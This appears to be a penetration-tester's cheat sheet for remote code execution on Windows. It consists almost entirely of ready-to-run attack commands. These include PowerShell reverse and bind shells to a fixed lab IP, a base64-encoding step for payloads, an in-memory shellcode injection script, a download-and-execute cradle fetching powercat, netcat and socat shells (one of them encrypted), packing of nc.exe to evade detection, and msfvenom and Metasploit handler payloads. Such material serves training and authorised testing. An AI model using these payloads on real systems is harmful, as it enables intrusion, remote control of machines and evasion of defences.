Skip to content

Windows Remote Code Execution

PowerShell

Encoded Payload

File reverse_shell_cleartext.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.11.130',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Encode payload and copy it to clipboard

cat reverse_shell_cleartext.ps1 | iconv -t UTF-16LE | base64 -w 0 | cs

Execute payload from clipboard

powershell -enc $(vs)

Reverse Shell

Kali machine

sudo nc -nlvp 443

Windows machine

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.11.130',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Bind Shell

Kali machine

nc -nv 192.168.11.131 443

Windows machine

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' +(pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Unrestricted and XClipborad

Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy

Install XClipboard

sudo apt install xclip

Alias XClipboard command with short character.

alias "cs=xclip -selection clipboard"
alias "vs=xclip -o -selection clipboard"

In-memory payload injection script

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

Powercat

Create Environment

Windows machine

. .\powercat.ps1
iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Kali machine

sudo apt install powercat
cat /usr/share/windows-resources/powercat/powercat.ps1

Reverse Shell

Kali machine

sudo nc -nlvp 443

Windows machine

powercat -c 192.168.11.130 -p 443 -e cmd.exe

Stand-Alone Payloads

Kali machine

sudo nc -nlvp 443

Windows machine

powercat -c 192.168.11.130 -p 443 -e cmd.exe -g > shell.ps1

.\shell.ps1

Encoded Payloads

Kali machine

sudo nc -nlvp 443

Windows machine

powercat -c 192.168.11.130 -p 443 -e cmd.exe -ge > encoded_shell.ps1
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0A...pAAoACgA=

Bind Shell

Kali machine

nc -nv 192.168.11.131 443

Windows machine

powercat -l -p 443 -e cmd.exe

Netcat

Packed File

upx -9 nc.exe

Reverse Shell

Kali machine

sudo nc -nlvp 443

Windows machine

nc -nv 192.168.11.130 443 -e cmd.exe

Bind Shell

Kali machine

nc -nv 192.168.11.131 443

Windows machine

nc -nlvp 443 -e cmd.exe

Socat

Reverse Shell

Kali machine

socat -d -d TCP4-LISTEN:443 STDOUT

Windows machine

socat TCP4:192.168.11.130:443 EXEC:cmd.exe

Encrypted Bind Shell

Create credential

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 999 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

Windows machine

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:cmd.exe

Kali machine

sudo socat OPENSSL:192.168.11.130:443,verify=0

Remote desktop

rdesktop $ip -u Tester -p Pass
xfreerdp /f /u:Tester /p:<Pass> /v:192.168.0.101 /drive:D,/tmp

Build Windows Binary File

i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
wine32 syncbreeze_exploit.exe

msfconsole multi handler

sudo msfconsole -x "use exploit/multi/handler; set RHOST ip; set PAYLOAD windows/shell_reverse_tcp; set LHOST tun0; exploit"
processing AutoRunScript 'post/windows/manage/migrate'

Nmap NSE Scripts Exploit

cd /usr/share/nmap/scripts
grep Exploits *.nse
nmap --script-help=clamav-exec.nse

PayloadsAllTheThings

Exploit Resources

Metasploit Framework

BeEF

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=443 EXITFUNC=thread  -f c –e x86/shikata_ga_nai -b "<badchars>"
msfvenom  --list encoders